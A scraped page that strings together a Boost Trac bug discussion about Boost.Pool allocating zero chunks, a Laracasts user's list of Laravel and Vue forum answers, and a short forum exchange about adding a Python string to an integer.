comment:6 Changed 5 years ago by johnmaddock
I can reproduce this with gcc-4.0.4 as well. Strange bug!
comment:7 Changed 5 years ago by johnmaddock
Update:
This is a result of two bugs:
1) std::vector invokes undefined behaviour by calling Allocator::allocate(0). This has been fixed in more recent GCC versions. 2) Boost.Pool, when it tries to allocate 0 chunks thinks allocation has failed (a bug), so allocates a whole new block, *and* ups the size of the next block to allocate by a factor of 2. So just a few allocation requests for 0 chunks blows up the heap.
This will be fixed in the sandbox version of Boost.Pool soon.
I can't reproduce the problem with gcc 4.4.1, or with MSVC 10. I'd guess that it has something to do with the standard library implementation of vector, though.
Can you try applying the patch to singleton_pool which I'm about to attach, run the following variation and save the output? It should produce code that you can compile which demonstrates the problem. Check that it actually triggers the problem, and attach it. | https://svn.boost.org/trac/boost/ticket/4960 | CC-MAIN-2016-22 | refinedweb | 559 | 63.19 |
When we are talking about how to start python we must understand the basic tools that will help you in writing better code debugging and dependency management.
How to start python projects.
To start any project it is always recommended to create the project in its own environment. This means that anything that is installed for python at the global level will not affect this env and vice versa.
VirutalENV:
Install virtualenv
sudo apt-get install virtualenv
After installation activate it.
virtualenv env_name -m python3
This will create an env for python 3 and you can start working inside it. Keep in mind that you have to activate the env before running your code to make it work.
Activate env:
sourve env_name/bin/activate
Now you can install any packages that you want to use in your python program.
Deactivate env:
deactivate
Pep8 formatting.
Pep8 is the formatting style that defines how you should format your python program. How you should name your variables and more such conventions. Pep8 is highly recommended for anyone who wants to work with the opensource community.
Dependency Management
For dependency management in python, we use pip. It is used for installing packages. You can have a file naming requirements.txt which will have all the packages that you need to install along with the version that you want to install.
HOW TO INSTALL PYTHON PACKAGE:
pip install package_name
HOW TO INSTALL USING REQUIREMENTS.TXT
pip install -r requirements.txt
Debugger
Well according to me python debugger is best for anyone who is starting. Now how to use it is as below.
Where ever you want to stop the execution of code and see the values or variables or execute whatever you want. You can use the below lines.
import pdb pdb.set_trace()
This will stop the execution of the program and give you control of the program.
Editor?
Pycharm is very good for python but if you are a power user of sublime that will be awesome.
Read more about python below
If you like the article please share and subscribe. You can also join our Facebook group: and Linkedin group: | https://www.learnsteps.com/how-to-start-python-basic-tooling-in-python/ | CC-MAIN-2020-50 | refinedweb | 357 | 66.74 |
TheThe input file contains one or more grids. Each grid begins with a line containing m and n, the number of rows and columns in the grid, separated by a single space. If m = 0 it signals the end of the input; otherwise 1 <= m <= 100 and 1 <= n <= 100. Following this are m lines of n characters each (not counting the end-of-line characters). Each character corresponds to one plot, and is either `*', representing the absence of oil, or `@', representing an oil pocket.
OutputForSample Output
0 1 2 2
这是一道dfs的简单题有利于初学者认识dfs
代码如下:
#include<iostream> #include<cstdio> #include<cstring> #include<algorithm> #include<cmath> using namespace std; int n,m; char s[110][110]; int xx[]={0,0,1,-1,1,-1,-1,1}; int yy[]={1,-1,0,0,1,-1,1,-1}; int x,y; int vis[110][110]; void dfs(int x,int y) { vis[x][y]=1; for(int i=0;i<8;i++){ int dx=x+xx[i]; int dy=y+yy[i]; if(!vis[dx][dy]&&dx>=0&&dx<n&&dy>=0&&dy<m&&s[dx][dy]=='@'){ dfs(dx,dy); } } return ; } int main() { while(scanf("%d %d",&n,&m)){ memset(vis,0,sizeof(vis)); if(m==0)break; for(int i=0;i<n;i++){ scanf("%s",s[i]); } //getchar(); //for(int i=0;i<n;i++){ //getline(cin,s[i]); //} int ans=0; for(int i=0;i<n;i++){ for(int j=0;j<m;j++){ if(!vis[i][j]&&s[i][j]=='@'){ dfs(i,j); ans++; } } } printf("%d\n",ans); } return 0; }你的努力,也许有人会讥讽;你的执着,也许不会有人读懂。在别人眼里你也许是小丑,在自己心中你就是国王。好好努力相信自己,不比别人差。 | https://www.codetd.com/article/561062 | CC-MAIN-2020-10 | refinedweb | 268 | 60.75 |
5 minutes ago,cbae wrote
*snip*
I don't know how you can say that. All of the sample C# code that I saw in the keynote had .NET namespace references, as far as I could tell. Maybe those namespaces weren't technically part of the .NET framework, but as long as you're using C# and can bind data to UI elements using XAML mark-up, who really cares?
They said that they went to great lengths to get WinRT namespaces to match .NET namespaces so that apps wouldn't need too many changes. I'm sure we'll learn a lot more at the WinRT session, but .NET was not mentioned once, only the languages were (C#/VB/XAML). Right now it seems that WinRT is a native wrapper around Win32, almost like an updated MFC. | http://channel9.msdn.com/Forums/Coffeehouse/Build-The-Discussion/1a5928c291844e298cc99f5d015d2992 | CC-MAIN-2014-52 | refinedweb | 138 | 83.86 |
11 min read
With approximately one billion people using Microsoft Office, the DOCX format is the most popular de facto standard for exchanging document files between offices. Its closest competitor - the ODT format - is only supported by Open/LibreOffice and some open source products, making it far from standard. The PDF format is not a competitor because PDFs can’t be edited and they don’t contain a full document structure, so they can only take limited local changes like watermarks, signatures, and the like. This is why most business documents are created in the DOCX format; there’s no good alternative to replace it.
While DOCX is a complex format, you may want to parse it manually for simpler tasks such as indexing, converting to TXT and making other small modifications. I’d like to give you enough information on DOCX internals so you don’t have to reference the ECMA specifications, a massive 5,000 page manual.
The best way to understand the format is to create a simple one-word document with MSWord and observe how editing the document changes the underlying XML. You’ll face some cases where the DOCX doesn’t format properly in MS Word and you don’t know why, or come across instances when it’s not evident how to generate the desired formatting. Seeing and understanding exactly what’s going on in the XML will help that.
I worked for about a year on a collaborative DOCX editor, CollabOffice, and I want to share some of that knowledge with the developer community. In this article I will explain the DOCX file structure, summarising information that is scattered over the internet. This article is an intermediary between the huge, complex ECMA specification and the simple internet tutorials currently available. You can find the files that accompany this article in the
toptal-docx project on my github account.
A Simple DOCX file
A DOCX file is a ZIP archive of XML files. If you create a new, empty Microsoft Word document, write a single word ‘Test’ inside and unzip it contents, you will see the following file structure:
Even though we’ve created a simple document, the save process in Microsoft Word has generated default themes, document properties, font tables, and so on, in XML format.
To start, let us remove the unused stuff and focus on
document.xml, which contains the main text elements. When you delete a file, make sure you have deleted all the relationship references to it from other the xml files. Here is a code-diff example on how I’ve cleared dependencies to app.xml and core.xml. If you have any unresolved/missing references, MSWord will consider the file broken.
Here’s the structure of our simplified, minimal DOCX document (and here’s the project on github):
Let’s break it down by file from here, from the top:
_rels/.rels
This defines the reference that tells MS Word where to look for the document contents. In this case, it references
word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns=""> <Relationship Id="rId1" Type="" Target="word/document.xml"/> </Relationships>
_rels/document.xml.rels
This file defines references to resources, such as images, embedded in the document content. Our simple document has no embedded resources, so the relationship tag is empty:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns=""> </Relationships>
[Content_Types].xml
[Content_Types].xml contains information about the types of media inside the document. Since we only have text content, it’s pretty simple:
<>
document.xml
Finally, here is the main XML with the document’s text content. I have removed some of namespace declarations for clarity, but you can find the full version of the file in the github project. In that file you’ll find that some of the namespace references in the document are unused, but you shouldn’t delete them because MS Word needs them.
Here’s our simplified example:
<w:document> <w:body> <w:p w: <w:r><w:t>Test</w:t></w:r> </w:p> <w:sectPr w:rsidR="005F670>
The main node
<w:document> represents the document itself,
<w:body> contains paragraphs, and nested within
<w:body> are page dimensions defined by
<w:sectPr>.
<w:rsidR> is an attribute that you can ignore; it’s used by MS Word internals.
Let’s take a look at a more complex document with three paragraphs. I have highlighted the XML with the same colors on the screenshot from Microsoft Word, so you can see the correlation:
<w:p w: <w:r> <w:t xml:This is our example first paragraph. It's default is left aligned, and now I'd like to introduce</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: <w:color w: </w:rPr> <w:t>some bold</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: <w:b/> <w:color w: </w:rPr> <w:t xml: text</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: <w:color w: </w:rPr> <w:t xml:, </w:t> </w:r> <w:proofErr w: <w:r> <w:t xml:and also change the</w:t> </w:r> <w:r w: <w:rPr><w:rFonts w: </w:rPr> <w:t>font style</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: </w:rPr> <w:t xml: </w:t> </w:r> <w:r> <w:t>to 'Impact'.</w:t></w:r> </w:p> <w:p w: <w:r> <w:t>This is new paragraph.</w:t> </w:r></w:p> <w:p w: <w:r> <w:t>This is one more paragraph, a bit longer.</w:t> </w:r> </w:p>
Paragraph Structure
A simple document consists of paragraphs, a paragraph consists of runs (a series of text with the same font, color, etc), and runs consist of characters (such as
<w:t>).
<w:t> tags may have several characters inside, and there might be a few in the same run.
Again, we can ignore
<w:rsidR>.
Text properties
Basic text properties are font, size, color, style, and so on. There are about 40 tags that specify text appearance. As you can see in our three paragraph example, each run has its own properties inside
<w:rPr>, specifying
<w:color>,
<w:rFonts> and boldness
<w:b>.
An important thing to note is that properties make a distinction between the two groups of characters, normal and complex script (Arabic, for instance), and that the properties have a different tag depending on which type of character it’s affecting.
Most normal script property tags have a matching complex script tag with an added “C” specifying the property is for complex scripts. For example:
<w:i> (italic) becomes
<w:iCs>, and the bold tag for normal script,
<w:b>, becomes
<w:bCs> for complex script.
Styles
There’s an entire toolbar in Microsoft Word dedicated to styles: normal, no spacing, heading 1, heading 2, title, and so on. These styles are stored in
/word/styles.xml (note: in the first step in our simple example, we removed this XML from DOCX. Make a new DOCX to see this).
Once you have text defined as a style, you will find reference to this style inside the paragraph properties tag,
<w:pPr>. Here’s an example where I’ve defined my text with the style Heading 1:
<w:p> <w:pPr> <w:pStyle w: </w:pPr> <w:r> <w:t>My heading 1</w:t> </w:r> </w:p>
and here is the style itself from
styles.xml:
<w:style w: <w:name w: <w:basedOn w: <w:next w: <w:link w: <w:uiPriority w: <w:qFormat/> <w:rsid w: <w:pPr> <w:keepNext/> <w:keepLines/> <w:spacing w: <w:outlineLvl w: </w:pPr> <w:rPr> <w:rFonts w: <w:b/> <w:bCs/> <w:color w: <w:sz w: <w:szCs w: </w:rPr> </w:style>
The
<w:style/w:rPr/w:b> xpath specifies that the font is bold, and
<w:style/w:rPr/w:color> indicates the font color.
<w:basedOn> instructs MSWord to use “Normal” style for any missing properties.
Property Inheritance
Text properties are inherited. A run has its own properties (
w:p/w:r/w:rPr/*), but it also inherits properties from paragraph (
w:r/w:pPr/*), and both can reference style properties from the
/word/styles.xml.
<w:r> <w:rPr> <w:rStyle w: <w:sz w: </w:rPr> <w:tab/> </w:r>
Paragraphs and runs start with default properties:
w:styles/w:docDefaults/w:rPrDefault/*
and
w:styles/w:docDefaults/w:pPrDefault/*. To get the end result of a character’s properties you should:
- Use default run/paragraph properties
- Append run/paragraph style properties
- Append local run/paragraph properties
- Append result run properties over paragraph properties
When I say “append” B to A, I mean to iterate through all B properties and override all A’s properties, leaving all non-intersecting properties as-is.
One more place where default properties may be located is in the
<w:style> tag with
w:type="paragraph" and
w:default="1". Note, that characters themselves inside a run never have a default style, so
<w:style w: doesn’t actually affect any text.
Toggle properties
Some of the properties are “toggle” properties, such as
<w:b> (bold) or
<w:i> (italic); these attributes behave like an XOR operator.
This means if the parent style is bold and a child run is bold, the result will be regular, non-bold text.
You have to do lots of testing and reverse-engineering to handle toggle attributes correctly. Take a look at paragraph 17.7.3 of ECMA-376 Open XML specification to get the formal, detailed rules for toggle properties/
Fonts
Fonts follow the same common rules as other text attributes, but font property default values are specified in a separate theme file, referenced under
word/_rels/document.xml.rels like this:
<Relationship Id="rId7" Type="" Target="theme/theme1.xml"/>
Based on the above reference, the default font name will be found in
word/theme/themes1.xml, inside a
<a:theme> tag,
a:themeElements/a:fontScheme/a:majorFont or
a:minorFont tag.
The default font size is 10 unless the
w:docDefaults/w:rPrDefault tag is missing, then it is size 11.
Text alignment
Text alignment is specified by a
<w:jc> tag with four
w:val modes available:
"left",
"center",
"right" and
"both".
"left" is the default mode; text is started at the left of paragraph rectangle (usually the page width). (This paragraph is aligned to the left, which is standard.)
"center" mode, predictably, centers all characters inside the page width. (Again, this paragraph exemplifies centered alignment.)
In
"right" mode, paragraph text is aligned to the right margin. (Notice how this text is aligned to the right side.)
"both" mode puts extra spacing between words so that lines get wider and occupy the full paragraph width, with the exception of the last line which is left aligned. (This paragraph is a demonstration of that.)
Images
DOCX supports two sorts of images: inline and floating.
Inline images appear inside a paragraph along with the other characters,
<w:drawing> is used instead of using
<w:t> (text). You can find image ID with the following xpath syntax:
w:drawing/wp:inline/a:graphic/a:graphicData/pic:pic/pic:blipFill/a:blip/@r:embed
The image ID is used to look up the filename in the
word/_rels/document.xml.rels file, and it should point to gif/jpeg file inside word/media subfolder. (See the github project’s
word/_rels/document.xml.rels file, where you can see the image ID.)
Floating images are placed relative to paragraphs with text flowing around them. (Here’s th github project sample document with a floating image.)
Floating images use
<wp:anchor> instead of
<w:drawing>, so if you delete any text inside
<w:p>, be careful with the anchors if you don’t want the images removed.
Tables
XML tags for tables are similar to HTML table markup–
<w:tbl>, the table itself, has table properties
<w:tblPr>, and each column property is presented by
<w:gridCol> inside
<w:tblGrid>. Rows follow one by one as
<w:tr> tags and each row should have same number of columns as specified in
<w:tblGrid>:
<w:tbl> <w:tblPr> <w:tblW w: </w:tblPr> <w:tblGrid><w:gridCol/><w:gridCol/></w:tblGrid> <w:tr> <w:tc><w:p><w:r><w:t>left</w:t></w:r></w:p></w:tc> <w:tc><w:p><w:r><w:t>right</w:t></w:r></w:p></w:tc> </w:tr> </w:tbl>
Width for table columns can be specified in the
<w:tblW> tag, but if you don’t define it MS Word will use its internal algorithms to find the optimal width of columns for the smallest effective table size.
Units
Many XML attributes inside DOCX specify sizes or distances. While they’re integers inside the XML, they all have different units so some conversion is necessary. The topic is a complicated one, so I’d recommend this article by Lars Corneliussen on units in DOCX files. The table he presents is useful, though with a small misprint: inches should be pt/72, not pt*72.
Here’s a cheat sheet:
Tips for Implementing a Layouter
If you want to convert a DOCX file (to PDF, for instance), draw it on canvas, or count number of pages, you’ll have to implement a layouter. A layouter is an algorithm for calculating character positions from a DOCX file.
This is a complex task if you need 100 percent fidelity rendering. The amount of time needed to implement a good layouter is measured in man-years, but if you only need a simple, limited one, it can be done relatively quickly.
A layouter fills a parent rectangle, which is usually a rectangle of the page. It add words from a run one by one. When the current line overflows, it starts a new one. If the paragraph is too high for the parent rectangle, it’s wrapped to the next page.
Here are some important things to keep in mind if you decide to implement a layouter:
- The layouter should take care about text alignment and text floating over images
- It should be capable of handling nested objects, such as nested tables
- If you want to provide full support for such images, you’ll have to implement a layouter with at least two passes, the first step collects floating images’ positions and the second fills empty space with text characters.
- Be aware of indentations and spacings. Each paragraph has spacing before and after, and these numbers are specified by the
w:spacingtag. Vertical spacing is specified by
w:afterand
w:beforetags. Note that line spacing is specified by
w:line, but this is not the size of the line as one may expect. To get the size of the line, take the current font height, multiply by
w:lineand divide by 12.
- DOCX files contain no information about pagination. You won’t find the number of pages in the document unless you calculate how much space you need for each line to ascertain the number of pages. If you need to find exact coordinates of each character on the page, be sure to take into account all spacings, indentations and sizes.
- If you implement a full-featured DOCX layouter that handles tables, note the special cases when tables span multiple pages. A cell which causes a page overflow also affects other cells.
- Creating an optimal algorithm for calculating a table columns’ width is a challenging math problem and word processors and layouters usually use some suboptimal implementations. I propose using the algorithm from W3C HTML table documentation as a first approximation. I haven’t found a description of the algorithm used by MS Word, and Microsoft has fine-tuned the algorithm over time so different versions of Word may lay out tables slightly differently.
If something is unclear: reverse-engineer the XML!
When it’s not obvious how this or that XML tag works inside MS Word, there are two main approaches to figuring it out:
Create the desired content step-by-step. Start with a simple docx file. Save each step to its own file, as in
1.docx,
2.docx, for example. Unzip each of them and use a visual diff tool for folder comparison to see which tags appear after your changes. (For a commercial option, try Araxis Merge, or for a free option, WinMerge.)
If you generate a DOCX file that MS Word doesn’t like, work backwards. Simplify your XML step by step. At some point you will learn which change MS Word found incorrect.
DOCX is quite complex, isn’t it?
It is complex, and Microsoft’s license forbids using MS Word on the server side for processing DOCX– this is pretty standard for commercial products. Microsoft has, however, provided the XSLT file to handle most DOCX tags, but it won’t give you 100 percent or even 99 percent fidelity. Processes such as text wrapping over images are not supported, but you will be able to support the majority of documents. (If you don’t need complexity, consider using Markdown as an alternative.)
If you have a sufficient budget (there is no free DOCX rendering engine), you may want to use commercial products such as Aspose or docx4j. The most popular free solution is LibreOffice for converting between DOCX and other formats, including PDF. Unfortunately, LibreOffice contains many small bugs during conversion, and since it’s a sophisticated, open-source C++ product, it’s slow and difficult to fix fidelity issues.
Alternatively, if you find DOCX layouting too complicated to implement yourself, you can also convert it to HTML and use a browser to render it. You can also consider one of Toptal’s freelance XML developers.
DOCX Resources for further reading
- ECMA DOCX specification
- OpenXML library for DOCX manipulation from C#. It doesn’t contain information on layouting or rendering code, but offers a class hierarchy matching each possible XML node in DOCX.
- You can always search or ask on stackoverflow with keywords like docx4j, OpenXML and docx; there are people in the community who are knowledgeable. | https://www.toptal.com/xml/an-informal-introduction-to-docx | CC-MAIN-2019-04 | refinedweb | 3,060 | 61.26 |
1,150Thomas left a reply on Laracast Post Time Issue
I remember informing @jeffreyway about this early on but it still has not changed. Guess something is wrong with the timezone offset calculations :)
Now I start wondering if there is also an time issue with the time estimate in scheduled videos.
Wondering when: will get online. Here it states 35 minute from now (14:25 UTC+2 - Amsterdam).
MThomas left a reply on How/Where Should I Code A Dropdown List
I think the best advice I can give you is start with a series like:
Next move on to series like: or the more recent
I’m fairly sure that these series will get you up to speed on how to use Laravel as it is designed.
Good luck!
MThomas left a reply on Urgent Whoops
MThomas left a reply on Casts
Casts can be used to convert (cast) a JSON string to a native array, or a mysql boolean (tiny int) to a php boolean (true/false).
In order to prevent users from entering invalid data, you need to validate the users input.
On a side note, you never should store or handle phone numbers as integers, this will get you in trouble:
And remember that php does not play nice with long integers
MThomas left a reply on Urgent Whoops
@pdc why open a 2 year old post for these kinds of discussions...
If you so strongly believe that Laravel is an insecure framework, show some evidence, make security reports or issues on GitHub... in stead of complaining... nobody here forces you to use it.
On the topic of Whoops. By default Laravel will disable Whoops for production... you have to enable it manually in order to show on production.
MThomas left a reply on Vue.js (Laravel + Vue) Not Working On IPhone.
Please elaborate on the issue...
What response do you get? Is it a Laravel issue? Have you tried turning on Debug Mode?
MThomas left a reply on How To Create Recursive Route?
Maybe this package might be of use:
MThomas left a reply on AssertSee Videos?
Great you got it to work!
As a rule of thumb, if you run into an issue, share the code your are working on, in this case the test method, the controller action etc :)
Good luck!
MThomas left a reply on 401 Unauthenticated In Ajax Login...
If you want us to help you, show us the code you have written, what routes you have defined etc.
A 404 means that it can't find the requested url, so that might be a start in your debugging.
MThomas left a reply on AssertSee Videos?
As far as I know you can assert the response contains a certain HTML string using
assertSee().
And please realize and accept(!) that you need to provide the forum with information, we don't know what you want etc, only in your last post you mentioned the use of YouTube and iframes, prior to that, it could have been an Laravel model etc...
MThomas left a reply on Authentication In An SPA
What about
And if the default drivers don't cover your use case you can find many others here:
And if you want to add your own OAuth server, take a look at
MThomas left a reply on Dynamically Create Subdomain
I guess, the best way to find out is to give it a try.
But as you need to record the subdomain somewhere there is no reason you could not redirect there (its nothing more than a regular redirect).
MThomas left a reply on How Can I Use Pagination In Laravel Vuejs?
Just the two first google results for:
laravel vue pagination:
In other words, what did you try, where did you get stuck?
MThomas left a reply on Dynamically Create Subdomain
Sounds like a Multi tenant approach might help you. This will also enable you to isolate all tenant/company data in seperate databases or tables.
Take a look at or for composer packages doing the heavy lifting.
If you like to do it yourself take a look at these two great blog posts:
MThomas left a reply on Route [admin.categories.index] Not Defined.
You namespace and file path are connected :).
If it solved your issue, please mark it as the answer, that helps others.
MThomas left a reply on Connection Could Not Be Established With Host Smtp.mailtrap.io [Connection Refused #111]
Two things, please tell us what you did, how does the code look that invoked the email.
Secondly you exposed you Mailtrap SMTP/API username and password, might best to remove them from the post and renew them on Mailtrap's side.
MThomas left a reply on Route [admin.categories.index] Not Defined.
What is the path of your controller?
It should be in
app/Http/Controller/Auth/Admin.
MThomas left a reply on Route [admin.categories.index] Not Defined.
Within the route group you prefix all controllers with ‘Auth/Admin’ and your CaregoriesController is just in App/Http/Controllers and not in App/Http/Controllers/Auth/Admin.
So if you want it to work move the file for the Admin directory and update the namespace accordingly.
MThomas left a reply on Variable Not Passing To View
What url are you visiting? How dis you install Laravel? Are you using Homestead or Valet?
MThomas left a reply on Conditional Filtering On Related Model
@andersb Not sure what you're asking. You said, that if there is a post, you would like to get all comments not just the comments of the post you're viewing, that is what that query does.. it only uses the timestamp of the post the user is viewing.
If the user is not viewing a post, but you just want comments that are a month old, Isn't that not just this:
MThomas left a reply on Get Data From 3 Tables With Relationship Laravel
@ABDULBAZITH - As mentioned in my earlier comment. Assuming you have created the relationship on your order model. The comments shows you don't have the following relationship:
// In your order model public function products() { return $this->hasMany(Product::class); } // In your product model // Or type is even better but then you need to update the eloquent query accordingly public function product_type() { return $this->belongsTo(ProductType::class); }
MThomas left a reply on Conditional Filtering On Related Model
Not sure if I get it right, but isn't it as simple as:
$post = Post::find(123); $comments = Comment::whereDate('created_at', '>', $post->created_at->addMonth());
MThomas left a reply on Hoping For Pointers On CRUD Logging...
OK, I get your point. Can you explain why you want to do that? In the case you mention, you could easily resolve the Country's name based on its ID.
I'm not entirely sure why you want to log for example that piece of data. Just thinking out of the box and filling in some information. But in case you try to log: "MThomas (Netherlands) updated his profile", you could do something like this:
activity() ->performedOn($user) ->causedBy(auth()->user()) ->withProperties(['country_id' => $user->country_id]) ->log("{$user->name} ({$user->country->name}) updated his profile.");
If this is not the case, let me try a different idea (have not tested or tried this). Assuming there is not an endless list of fields from related models you'd like to log. Why not create an accessor attribute for the item you like to log, and add it to the luggable attributes:
use Illuminate\Database\Eloquent\Model; use Spatie\Activitylog\Traits\LogsActivity; class User extends Model { use LogsActivity; protected $guarded = [*]; protected static $logAttributes = ['name', 'country']; protected static $logOnlyDirty = true; // Only log created and changed fields public function country() { return $this->belongsTo(Country::class); } public function getCountryAttribute() { $this->country->name; } }
MThomas left a reply on Get Data From 3 Tables With Relationship Laravel
Why not use the GroupBy functionality of Eloquent, assuming your Order model has a product relationship and your Product model a product_type relationship.
Order::with(['product.product_type' => function($query){ $query->groupBy('id'); }])->get();
MThomas left a reply on Hoping For Pointers On CRUD Logging...
The package will log all or a selection of fields for models (that have a certain trait and implementation) every time you create or update the model. So if you add the trait to all models you want to track, you should be fine.
Yes, you might log more that you need, but you could create a artisan job that deletes unnecessary logged items or something like it (if it is really a problem). Otherwise using a standard package that fits 80% of your need vs the downside of building and maintaining your own implementation might not weigh up.
MThomas left a reply on Azure AD Authentication In My Laravel Web App
MThomas left a reply on Hoping For Pointers On CRUD Logging...
Is the thing you are looking for? You should be able to use v1.
MThomas left a reply on Azure AD Authentication In My Laravel Web App
Any reason you're not using on of the Azure AD packages? For example? -- Extension of Socialite -- Based on middleware
MThomas left a reply on Is There A Way To List All Relationships Of A Model?
MThomas left a reply on Check If Model Has Changed Since First Save
Not build in (as far as I know). But I can highly recommend this package by Spatie:
it enables you to track changes for specified attributes.
MThomas left a reply on Open A Register Form Only In Sunday
MThomas left a reply on Open A Register Form Only In Sunday
Even more elegant is:
if(now()->->isSunday()) { return view('foo.bar'); }
You leverage Carbon and the Laravel helper which makes it even more expressive.
MThomas left a reply on Select Inputs Ignored By Validation
Are you sure your request data includes the field?
Try a
return $request->all() before validating to check it is in your request data.
If you want to include user input in your validated data array, you can add it without any rules:
'email' => 'required|email', 'data_not_validated' => '',
If you want to manually add something to a create method you could do this:
$data = $request->validate([ // 'email' => ['required', 'email'], // ]); $data['foo'] = 'bar'; $model = Post::create($data);
MThomas left a reply on Select Inputs Ignored By Validation
You could use ‘required|in:male,female’
MThomas left a reply on How To Install This IBAN Validator In LARAVEL
Why not use this package:
This is tailormade for Laravel.
MThomas left a reply on Role-based Multi-tenant With Tenant Subscription To Selected Features
Yes, the can directive can limit access to resources, and you can also scope queries down to the teams (could even add a global scope for this).
With regard to the subscriptions. You could add that functionality to the team model instead of the user model.
MThomas left a reply on Role-based Multi-tenant With Tenant Subscription To Selected Features
You should take a look at this works great with Laravels permission system.
And as you said, combine it with Laravel cashier and you will have the most flexible integration you can wish for.
Just asign users roles and teams, and link permissions to roles and teams. You could use the Laravel's gate/authorization features to check the acces to a certain resource based on there presence in a team.
MThomas left a reply on Thoughts On Subscribing To Laracasts?
If you are still in doubt, why not register for a monthly subscription and find out yourself. I found I extremely useful, and if you take a look around at the forum and the users badges, you will see there are very experienced developers and juniors here. For everyone there will be something useful.
MThomas left a reply on How Can I Hide Or Remove Id From Url In Laravel?
Take a look at this package, will leverage a lot of work for you:
MThomas left a reply on How To Configure Laravel Passport's '/oauth/token' Rate Limit?
Isn't this what you are looking for:
Route::middleware('auth:api', 'throttle:60,1')->group(function () { Route::get('/user', function () { // }); });
MThomas left a reply on CORS Issue Only On Axios
This package might help you:
MThomas left a reply on VUE.js | Reload Page On External Server After Update.
You need to inform the client (that is where the JavaScript is rendered) that it needs to refresh. You can do this using Broadcasting in Laravel. You’ll need a service like Pusher or Laravel-Websockets to make it work.
Those are needed to establish a connection from the client to your server in order to push an update without a trigger from the user.
An totally different option is to reload the page (or perform an Ajax request) every x seconde or minutes to your server.
MThomas left a reply on Task Scheduling Runs Every Minute Despite My Directions
The idea is that the cron job is called every minute. And that you set the timeframe/interval on your jobs. If there is no job set in your code base for the moment the cronjob runs, no jobs will be executed. If there is a job set in the codebase for that moment, it will run.
Or have I completely missunderstood your problem?
MThomas left a reply on Differents Between Eloquent ORM And Query Builder?
They are linked. Eloquent lets you use models to query your database. The query builder is what is used under the hood in Eloquent. And you can use) to query your database directely and build upon eloquent queries.
MThomas left a reply on Laravel 5.8 Does Not Use Sqlite For Testing
Did you install Laravel Telescope? If so, you need to be sure you have the line below in your
phpunit.xml:
<env name="TELESCOPE_ENABLED" value="false" />
Somehow having telescope enabled while running tests causes an .env problem.
MThomas left a reply on Data Is Not Deleting In Laravel
Did you use the Vue component structure and compiled it down?
<template> <a href="#" @ <i class="fa fa-trash red"></i> </a> </template> <script> export default { data() { return { } }, methods: { deleteUser(id){ Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", type: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { //send request to the server this.form.delete('api/user/'+id).then(()=>{ Swal.fire( 'Deleted!', 'Your file has been deleted.', 'success' ) }).catch(()=>{ swal("Failed!", "There was something worng.", "warning"); }); }) }, } mounted() { console.log('Component mounted.') } } </script>
MThomas left a reply on Logout In Laravel Not Working
What did you change? Did you do something with the authentication routes, did you change the logic in the auth scaffold? It must be there since your code seems very similar to the default code in app.blade.php
<div class="dropdown-menu dropdown-menu-right" aria- <a class="dropdown-item" href="{{ route('logout') }}" onclick="event.preventDefault(); document.getElementById('logout-form').submit();"> {{ __('Logout') }} </a> <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;"> @csrf </form> </div>
Or try reverting back to the code above, the one that is provided in the default
layout/app.blade.php file :)
MThomas left a reply on Bulk Delete Of Records Where SoftDeletes Is True
MThomas left a reply on Bulk Delete Of Records Where SoftDeletes Is True
You don't have to pas the delete in
forceDelete, you are already in the context of the delete...
You could change the inside of your loop to chain the
forceDelete method:
Post::where('id', $post)->forceDelete();
And assuming that
$post is an single ID and
$postsToDelete an array of ID's instead of the loop you could do:
Post::whereIn('id',$postsToDelete)->forceDelete();
MThomas left a reply on Getting Relation's Related Fields In Laravel Eloquent Model
use
qty_prices() instead. You need the query builder for the
with() method :)
$this->qty_prices will give you a collection of all the related prices.
$this->qty_prices() will return a query builder object that you can build upon with Eloquent methods like
with() | https://laracasts.com/@MThomas | CC-MAIN-2019-39 | refinedweb | 2,691 | 61.67 |
I am pretty sure my math is correct, but for some reason my variable seems to be holding old values?
If some one would be so kind enough to run this code they will see.
My first few conversions work great ie; 0c = -32f, 212f = 100c
How ever 100c = 68f is definatley wrong
Any help would be appreciated.
namespace WindowsFormsApplication9 { public partial class Form1 : Form { private float _num1, _num2, _answer, answer; public Form1() { InitializeComponent(); } private void btn1_Click(object sender, EventArgs e) //convert to F { _num1 = Convert.ToSingle(txtc.Text); _answer = (_num1-32) * (9 / 5); lbx.Items.Add(_answer + " F "); } private void button1_Click(object sender, EventArgs e) //convert to C { _num2 = Convert.ToSingle(txtf.Text); answer = (_num2 - 32) * 5 / 9; ; lbx.Items.Add(answer + " C "); } } | http://www.dreamincode.net/forums/topic/325548-yet-another-temp-converter-c%23-math-problem/ | CC-MAIN-2017-34 | refinedweb | 124 | 55.64 |
#include <audiofile.h>
float afGetFrameSize (AFfilehandle file, int track, int expand3to4);
file is a valid AFfilehandle.
track is an integer which refers to a specific audio track in the file. At present no supported audio file format allows for more than one audio track within a file, so track should always be AF_DEFAULT_TRACK.
expand3to4 is a boolean-valued integer indicating whether frame size calculation will treat 24-bit data as having a size of 3 bytes or 4 bytes.
afGetFrameSize returns the number of bytes in a frame in a given audio track.
A sample frame consists of one or more samples. For a monaural track, a sample frame will always contain one sample. For a stereophonic track, a sample frame will always contain two samples, one for the left channel and one for the right channel.
A non-zero value of expand3to4 should be used when calculating the frame size for storage in memory (since 24-bit audio data is presented in memory as a 4-byte sign-extended integer), while a value of zero should be used for calculating storage on disk where no padding is added. The parameter expand3to4 is ignored unless the specified audio track contains 24-bit audio data.
Michael Pruett <michael@68k.org> | https://man.linuxreviews.org/man3/afGetFrameSize.3.html | CC-MAIN-2020-40 | refinedweb | 209 | 61.56 |
this line:
total = total + x
total is a integer, x is a string. Now look at the error message. You will need to cast x to a integer
x
Also, a function ends the moment a return keyword is reached, which in your case, happens in the first run of the loop, you might want to change the indent of return so the whole loop can run
Thank you for the help, however I think I need to ask better questions. Could you provide insight into where this conversion should take in the code? Im not sure if my conversion code is correct but I think understanding where it should be could help me out!
you want to add x (string) to total (integer), which doesn't work (different data types)
